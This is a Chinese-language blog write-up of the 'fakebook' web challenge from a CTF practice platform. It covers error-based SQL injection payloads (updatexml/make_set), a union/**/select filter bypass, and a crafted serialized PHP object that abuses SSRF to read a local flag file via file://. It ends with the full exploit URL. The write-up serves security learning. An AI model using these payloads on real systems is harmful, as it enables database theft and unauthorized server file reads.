攻防世界fakebook

最新推荐文章于 2024-06-10 15:16:24 发布

Rgylin

最新推荐文章于 2024-06-10 15:16:24 发布

阅读量109

点赞数

分类专栏： web

本文链接：https://blog.csdn.net/qq_46540840/article/details/119464860

版权

web 专栏收录该内容

13 篇文章 1 订阅

订阅专栏

打卡之后

发现有login 还有join

先从login开始做起,发现登入界面,post 型尝试一下抓包注入

请添加图片描述

右键copy to file 提取成 txt 文件尝试无果

尝试扫描一下目录

请添加图片描述

尝试访问flag.php 无果那就应该访问不到继续走

那就分析 join 首先注册之后一点发现

/view.php?no=1

发现注入点

?no=1 and 1=1 正常
?no=1 and 1=2

请添加图片描述

出现报错信息,并暴露出路径

利用报错注入payload

1 and updatexml(1,concat(0x7e,(select group_conat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+

请添加图片描述

发现出现这个,经测试是过滤了0x7e 0x5e 等等当然将0x7e 带换成’~'是可以的

-1 and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),1)--+

搜一些大佬解法是利用

1 and updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#

补充make_set: 简单的来说就是第一个参数将其转成二进制数并逆置然后将后面的参数依次到对应的二进制位上,输出

然后就是提取列名

-1 and updatexml(1,make_set(3,'~',(select group_concat(column_name) from information_schema.columns where table_name='users')),1)#

-1 and updatexml(1,make_set(3,'~',(select data from users)),1)#

请添加图片描述

发现是发序列化的数据,emm 就没思路了

后来知道是查看robots.txt 得到备份文件

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();//初始化curl会话

        curl_setopt($ch, CURLOPT_URL, $url);//设置要抓去的url
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

发现是对url 的请求，并没有对url 进行任何的过滤所以存在ssrf攻击

那末思路有了

利用反序列化 file:///命令对内容进行flag 请求

<?php
class UserInfo
{
    public $name = "1";
    public $age = 0;
    public $blog = "file:///var/www/html/flag.php";



}
$a = new UserInfo();
echo serialize($a);

判断出列数有4列 (从3开始试就完了只有4正常),但是这里的union select 被过滤了

不知道试过滤的啥思路又断了看大佬wp 是说没过滤完全:

构造:union/**/select 即可

最后payload

http://111.200.241.244:53194/view.php?no=-1%20%20union/**/select%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:1:%221%22;s:3:%22age%22;i:0;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27

请添加图片描述

查看源码得flag 请添加图片描述

Rgylin

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
攻防世界fakebook

打卡之后发现有login 还有join先从login开始做起,发现登入界面,post 型尝试一下抓包注入右键copy to file 提取成 txt 文件尝试无果尝试扫描一下目录尝试访问flag.php 无果那就应该访问不到继续走那就分析 join 首先注册之后一点发现/view.php?no=1发现注入点?no=1 and 1=1 正常?no=1 and 1=2出现报错信息,并暴露出路径利用报错注入payload1 and updatexml(1,conca
复制链接

扫一扫

专栏目录